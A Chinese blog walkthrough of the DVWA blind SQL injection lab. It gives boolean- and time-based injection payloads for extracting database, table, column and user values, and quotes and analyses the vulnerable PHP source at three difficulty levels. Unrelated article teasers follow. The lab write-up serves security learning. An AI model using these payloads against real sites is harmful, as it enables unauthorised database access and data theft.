7、DVWA——SQL盲注

2023-09-13 15:45:54

文章目录

一、概述

  盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。

普通注入与盲注的区别:

  普通注入是可以根据报错提示,进行sql语句注入从而,直接爆出我们想要的信息,比如数据库版本、数据库名、用户名、操作系统版本等;而盲注只能通过多次猜测,从而猜解出有用信息。相对来说sql盲注更加考验安全人员的手注能力。

SQL盲注分类:

  • 布尔盲注
  • 事件盲注
  • 报错盲注

二、low

2.1 通关思路(布尔盲注)

(1)判断是否存在SQL注入漏洞

在参数后面添加',来判断是否存在sql注入漏洞。

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

  • 引号被拼接到SQL语句中,由此可见,存在SQL注入漏洞。
  • 同时,此处只是返回ID值在不在数据库中,页面可由此分为True和False,因此,该SQL注入属于布尔盲注。

(2)判断属于数字型注入还是字符型注入

在这里插入图片描述

1+and+1=1+--+

注意:payload需要URL编码。

在这里插入图片描述

1+and+1=2+--+

在这里插入图片描述

两次页面返回一致,属于字符型注入。下一步判断闭合符号~

1'+and+1=1+--+

在这里插入图片描述

1'+and+1=2+--+

在这里插入图片描述

两次页面返回不一致,故该SQL注入漏洞属于字符型注入,且单引号闭合。

(3)判断结果集中的字段数

注意:order by是对查询结果中的某个字段进行排序,并不能说明表中含有几个字段。

1'+order+by+<数字>+--+

在这里插入图片描述
在这里插入图片描述

可知,该页面(表)存在两个字段。

(4)猜数据库名长度

因为盲注没有回显点,故不能使用union进行联合查询。使用length()函数来判断数据库名的长度。

1'+and+length(database())=1+--+

使用sniper进行爆破
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

由此,可知数据库名长度为4。

(5)猜数据库名

1'+and+ascii((substr(database(),<变量1>,1)))=<变量2>+--+

注:

  • substr(string, start, length):提取字串。start从1开始。
  • 大写英文的ASCII值范围:65-90
  • 小写英文的ASCII值范围:97-122
  • 变量1的范围在0-3

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

可以得知,数据库名第一个字母为d。
依次,可以得到整个数据名为dvwa。

(6)猜表的个数

1'+and+(select+count(table_name)+from+information_schema.tables+where+table_schema=database())=1+--+

同理,爆表个数
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

由此可见,数据库中存在两个表。

(7)猜第一个表名

1'+and+ascii(substr((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),0,1))=103+--+

注:limit 0,1 代表第一行数据;选第二行数据应该是limit 1,1
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  • 第一个表名的第一个字母为g;
  • 同理,可以爆破出第一个表名为guestbook,第二个表名为users

(8)猜user表中的字段个数、每个字段的长度、名称

1)该表中的字段个数

1'+and+(select+count(column_name)+from+information_schema.columns+where+table_schema=database()+and+table_name='users')=8+--+

在这里插入图片描述

这里就不进行爆破了,最终可以得到:users表中含有8个字段。

2)猜第一个字段的长度

1'+and+length((select+column_name+from+information_schema.columns+where+table_name='users'+limit+0,1))=7+--+

注:

  • 猜第二个字段的长度就将limit 0,1改为limit 1,1,依此类推。

在这里插入图片描述

可知,第一个字段长度为7。

3)猜第一个字段的第一个字母

1'+and+ascii(substr((select+column_name+from+information_schema.columns+where+table_name='users'+limit+0,1),1,1))=117+--+

注:第一个字段的第二个字母就将limit+0,1),1,1改为limit+0,1),2,1

在这里插入图片描述

  • 按照上述思路,对user表中的每个字段进行爆破,最终可以得到每个字段名。
  • 可以知道users表中含有user和password两个字段。

(9)猜字段内容

1)以猜user字段的第一个字段值为例:

1'+and+length((select+user+from+dvwa.users+limit+0,1))=5+--+

在这里插入图片描述

可以得知,第一个字段值长度为5。

2)猜第一个字段值的首字母

1'+and+ascii(substr((select+user+from+dvwa.users+limit+0,1),1,1))=97+--+

在这里插入图片描述

可以得到第一个字母为a。用同样的方法得到整个字段值。

2.2 通关思路(时间盲注)

(1)判断是否存在SQL注入漏洞,属于字符型还是数字型

1+and+sleep(5)+--+ //数字型则等待5秒;
1'+and+sleep(5)+--+ //字符型则等待5秒;

在这里插入图片描述
在这里插入图片描述

故,此处存在SQL注入漏洞,且属于字符型注入,单引号闭合。

(2)猜测当前数据库名长度、首字母

1)猜测数据库名长度

需要用到的函数if(a,b,c):a是条件,满足返回b,不满足返回c

1'+and+if(length(database())=4,sleep(5),1)+--+

在这里插入图片描述

延迟5秒,说明数据库名的长度为4。

2)猜测数据库名的首字母

1'+and+if(ascii((substr(database(),1,1)))=100,sleep(5),1)+--+

在这里插入图片描述

  • 延迟5秒,说明首字母的ascii值为100;
  • 注意此时页面会报错嗷~
  • 后续步骤同布尔盲注,无非是加了一个if函数。

2.3 源码分析

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Get input
    $id = $_GET[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    mysql_close();
}

?>

分析:
  源码直接用 GET 方法传入参数 id,但是没有经过任何过滤就拿去 SQL 查询了。同时我们看到网页并不会返回查询的结果,而是当查询到内容时返回 “User ID exists in the database”,查不到时返回 “User ID is MISSING from the database”。

三、medium


<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    $id = mysql_real_escape_string( $id );

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    //mysql_close();
}

?>

分析:源码使用了 mysql_real_escape_string() 函数转义字符串中的特殊字符。也就是说特殊符号 \x00\n\r\'"\x1a 都将进行转义。同时开发者把前端页面的输入框删了,改成了下拉选择表单,希望以此来控制用户的输入。

需要注意的是,加单引号,页面返回报错,可能会误判。例如,正常是查id等于1的用户,转义后就会去查id等于1\'的用户,显然数据库没有。故,注意可能会误判。

在这里插入图片描述

四、high

<?php

if( isset( $_COOKIE[ 'id' ] ) ) {
    // Get input
    $id = $_COOKIE[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Might sleep a random amount
        if( rand( 0, 5 ) == 3 ) {
            sleep( rand( 2, 4 ) );
        }

        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    mysql_close();
}

?>

分析:High 级别的只是在 SQL 查询语句中添加了 LIMIT 1,这令服务器仅回显查询到的一个结果。同时源码利用了 cookie 传递参数 id,当 SQL 查询结果为空时会执行函数 sleep(),这是为了混淆基于时间的盲注的响应时间判断。

更多推荐

Vue3-初识Vue3、创建Vue3工程、vue3组合式API(setup、ref函数、reactive函数)、响应式原理、计算属性、监视属性

Vue3(1)目录Vue3(1)一、Vue3简介二、创建Vue3.0工程1、使用vue-cli创建2、使用vite创建三、常用的CompositionAPI(组合式API)1、拉开序幕的setup2、ref函数3、reactive函数4、Vue3中响应式原理(1)Vue2中响应式原理(2)Vue3中的Proxy(3)V

【C++STL基础入门】list改、查操作

文章目录前言一、list查操作1.1迭代器循环1.2for_each函数二、list改操作2.1迭代器修改2.2assign函数2.3=运算符总结前言C++标准模板库(STL)是C++语言中非常重要的部分,它提供了一组通用的模板类和函数,用于处理常见的数据结构和算法问题。其中之一是list(链表),它是一种双向链表容器

TOWE一转二家用无线遥控插座,让生活变得简单

随着科技的进步,人们的生活方式正在发生改变,越来越多的智能家居产品进入我们的生活中,为我们的生活带来了极大的便利。无线遥控插座作为一种集成了无线遥控技术与插座功能的创新产品,在家庭、办公、商业场景有着广泛的应用。同为科技(TOWE)一转二家用无线遥控插座是TOWE专为万物互联时代潮流趋势下开发的场景应用产品,为用户各类

python学习之【包和内置模块】

前言接上篇文章python学习之【模块】,这篇文章接着学习python中的包。python中的包包是一种用“点式模块名”构造Python模块命名空间的方法。在包中存放着一些功能相近的模块。包的创建和导入包的创建我们可以在pytarm中创建一个package文件,当我们创建完成后会自动创建一个__init__.py文件,

【Vue+NodeJS】vue路由及NodeJS环境搭建(Windows版)

一、Vue路由1、什么是Vue路由Vue路由是Vue.js框架中用于实现单页面应用(SPA)的路由管理器。它允许您创建多个页面之间的导航,并通过URL的变化来动态加载不同的组件。Vue路由通过声明式的方式定义页面的导航规则,并提供了一些内置的导航组件和功能,如路由链接、路由视图和导航守卫。通过Vue路由,您可以定义不同

数据预处理方式合集

删除空行#delallNonevaluedata_all.dropna(axis=1,how='all',inplace=True)删除空列#delallNonevaluedata_all.dropna(axis=0,how='all',inplace=True)缺失值处理观测缺失值观测数据缺失值有一个比较好用的工具包

蓝桥杯 题库 简单 每日十题 day6

01删除字符题目描述给定一个单词,请问在单词中删除t个字母后,能得到的字典序最小的单词是什么?输入描述输入的第一行包含一个单词,由大写英文字母组成。第二行包含一个正整数t。其中,单词长度不超过100,t小于单词长度。输出描述输出一个单词,表示答案。输入输出样例示例1输入LANQIAO3输出AIAO#include<st

【物联网】常见电子元器件(电阻、电容、电感、二极管、三极管)综合,详细分析原理及其应用

电子元器件是现代电子技术的基础,它们在各个领域中发挥着重要作用。从三极管到电容器、电阻器,这些常用元器件承担着放大、开关、滤波等关键任务。它们的特性和组合方式决定了电路的性能和功能。本文将介绍常用电子元器件的工作原理和应用场景,帮助读者更好地理解和运用它们。无论是电子爱好者还是专业工程师,对于电子元器件的了解都是必不可

走进人工智能| 智能物联网 AIoT的魅力交织

前言:AI+IoT是指人工智能(AI)与物联网(IoT)的结合。智能物联网是一种技术体系,通过连接和集成物理设备、传感器和互联网,实现设备之间的智能交互和数据共享,为人们提供智能化、自动化和高效化的生活和工作体验。文章目录序言背景领跑巨头核心技术支持目前形式发展的困难点总结序言智能物联网(InternetofThing

通信相关常识

MSISDN手机号“MSISDN”是一个移动电话号码的标识,它是国际移动用户识别码(IMSI)和移动国家代码(MCC)以及移动网络代码(MNC)的组合。MSISDN是一个唯一的电话号码,用于标识移动设备在移动通信网络中的位置和身份。它通常由国家码(国家的电话区号)和用户号码(用户的本地号码)组成。例如,一个常见的MSI

任意文件的上传和下载

1.任意文件下载(高危)定义一些网站由于业务需求,往往需要提供文件查看或文件下载功能,但若对用户查看或下载的文件不做限制,则恶意用户就能够查看或下载任意敏感文件,这就是文件查看与下载漏洞。可以下载(参数没有限制)可以通过../上一级的形式猜测下载配置文件,获取系统的账号密码挖洞的方式一般链接形式:download.ph

热文推荐
  1. ASCII码对照表(十进制、八进制、十六进制、二进制的字符对照表)

    ASCII(AmericanStandardCodeforInformationInterchange):美国信息交换标准代码是基于拉丁字母的一套电脑编码系统,主要用于显示现代英语和其他西欧语言。它是最通用的信息交换标准,并等同于国际标准ISO/IEC646。ASCII第一次以规范标准的类型发表是在1967年,最后一次

  2. Java实现添加文字水印、图片水印功能实战

    Java实现添加文字水印、图片水印功能实战本文介绍java实现在图片上加文字水印的方法,水印可以是图片或者文字,操作方便。java实现给图片添加水印实现步骤:获取原图片对象信息(本地图片或网络图片)添加水印(设置水印颜色、字体、坐标等)处理输出目标图片1.java实现给图片添加文字水印1.1获取原图片对象信息第一步:获

  3. 不过是一棵红黑树(附源码)

    前言红黑树,可谓是名号响当当的一种数据结构了。在数据结构学习的初期我们了解到了搜索二叉树,并且知道搜索二叉树的效率是非常之高的,在理想情况下10亿个数据中找一个值它也只需要30次左右,但是它尽管如此厉害可是也有不足的地方,在一些极端情况下,搜索二叉树可能会被退化成一棵单链表,那么此时它的效率就会大打折扣的变成O(n)。

  4. IOTE 2023国际物联网展直击:芯与物发布全新定位芯片,助力多领域智能化发展

    IOTE2023国际物联网展,作为全球物联网领域的盛会,于9月20日在中国深圳拉开帷幕。北斗星通集团应邀参展,旗下专业从事物联网、消费类GNSS芯片研发设计的芯与物公司也随其亮相本届盛会。展会上,芯与物展示了一系列创新的GNSS定位芯片产品,引领了国内定位技术的发展潮流。其市场总监黄秋菊女士揭幕了公司最新的产品CC11

  5. vue-cli创建项目、vue项目目录结(运行vue项目)、es6导入导出语法、vue项目编写规范

    vue-cli创建项目、编写vue项目、1vue-cli创建项目1.1vue-cli命令行创建项目1.2使用vue-cli-ui创建2vue项目目录结构2.1运行vue项目2.2vue项目的目录结构3es6导入导出语法4vue项目编写规范4.1修改项目4.2以后写vue项目,只需要在固定位置写固定代码即可1vue-cl

  6. 【K8S系列】深入解析k8s网络插件—Calico

    序言做一件事并不难,难的是在于坚持。坚持一下也不难,难的是坚持到底。文章标记颜色说明:黄色:重要标题红色:用来标记结论绿色:用来标记论点蓝色:用来标记论点Kubernetes(k8s)是一个容器编排平台,允许在容器中运行应用程序和服务。今天学习一下k8s网络插件-Calico相关知识希望这篇文章能让你不仅有一定的收获,

  7. 软件测试常问面试题

    1、讲一下你最熟悉的模块是怎么测试的?2、fiddler如何抓https请求?步骤:设置浏览器http代理安装证书导入证书,端口号8888手机端获取fiddler的地址,配置无线局域网代理,安装手机证书。3、jmeter如何参数化(1)用户定义的变量添加一个线程组----添加一个配置元件—用户定义的变量。填写好变量名如

  8. 【网络技术】TCP详解

    1TCP是什么TCP是TransmissionControlProtocol的缩写,即传输控制协议。TCP是一种面向连接的、可靠的、基于字节流的传输协议,是互联网通信协议TCP/IP中的一个重要组成部分。2三次握手三次握手的过程可以用以下图示表示:2.1详细介绍TCP协议使用三次握手(Three-wayhandshak

  9. 使用VScode SSH公网远程连接本地服务器开发【无公网IP内网穿透】

    文章目录前言1、安装OpenSSH2、vscode配置ssh3.局域网测试连接远程服务器4.公网远程连接4.1ubuntu安装cpolar内网穿透4.2创建隧道映射4.3测试公网远程连接5.配置固定TCP端口地址5.1保留一个固定TCP端口地址5.2配置固定TCP端口地址5.3测试固定公网地址远程前言远程连接服务器工具